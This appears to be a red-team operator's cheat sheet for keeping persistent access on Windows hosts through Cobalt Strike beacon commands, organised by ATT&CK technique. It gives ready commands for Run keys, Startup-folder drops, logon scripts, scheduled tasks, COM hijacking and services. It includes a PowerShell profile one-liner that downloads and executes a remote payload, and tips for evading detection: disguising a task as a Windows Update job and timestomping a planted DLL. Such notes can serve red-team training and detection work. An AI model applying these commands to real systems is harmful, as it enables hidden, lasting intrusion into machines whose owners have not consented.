. Boot & Logon Autostart Execution: T1547

Registry (upload payload to path and use registry)
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run <- Runs always
- HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce  <-Runs once and gone
Command to use in beacon: reg_set <host:optional> <hive> <key> <value> <type> <data>
- reg_query to check
- reg_delete to remove
----------------------------------------------------
Startup Folder
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup <- put payload there
----------------------------------------------------
Logon Scripts: T1037.001

HKCU\Environment\UserInitMprLogonScript
 reg_set HKCU Environment UserInitMprLogonScript REG_EXPAND_SZ %USERPROFILE%\Path_to_payload
 
(This is different then when we modified the actual login scripts on the network)
----------------------------------------------------

Powershell Profile: T1546.013
Ex. location for a profile: $HOME\Documents\WindowsPowerShell\Profile.ps1 (Microsoft has other locations as well). If it dont exist you can create it (with correct perms)
- need to make sure your code does not block the provile script from loading
$_ = Start-Job -ScriptBlock { iex (new-object net.webclient).downloadstring("url_to_payload") }

-----------------------------------------------------

Schedule Task: T1053.005
schtaskscreate \Beacon XML CREATE <-- BOF to schedule a task (Replace Beacon with Name we want)
schtasksdelete to remove it.

-----------------------------------------------------

Com Hijacking (Component Object Model (COM)): T1546.015

Allows a interface that all the languages can use. 

HKEY_CLASSES_ROOT\CLSID 
- InProcServer32 or LocalServer32
-- Path to DLL or EXE on the disk that provides COM function

Procmon filters to find com hijacking
- The Operation is RegOpenKey.
- The Path contains InprocServer32 or LocalServer32.
- The Result is NAME NOT FOUND
Rename and timestomp the DLL to help it blend in.

-----------------------------------------------------

Elevated Persistence

Scheduled Task:
c\windows\system32
upload payload
schtaskscreate \Beacon XML CREATE (ex. schtaskscreate \Microsoft\Windows\WindowsUpdate\Updater XML CREATE)

May have to reboot the box to spawn

Clean up
schtasksdelete \Microsoft\Windows\WindowsUpdate\Updater TASK

-----------------------------------------------------

Windows Service (must use a svc beacon)

beacon> cd C:\Windows\System32\
beacon> upload C:\Payloads\beacon_x64.svc.exe
beacon> mv beacon_x64.svc.exe debug_svc.exe

beacon> sc_create NAME_SERVICE_HERE "Debug Service" C:\Windows\System32\debug_svc.exe "Windows Debug Service" 0 2 3

sc_query Name_Service_Here
sc_start Service_name or reboot
sc_delete service_name to clean up

-----------------------------------------------------



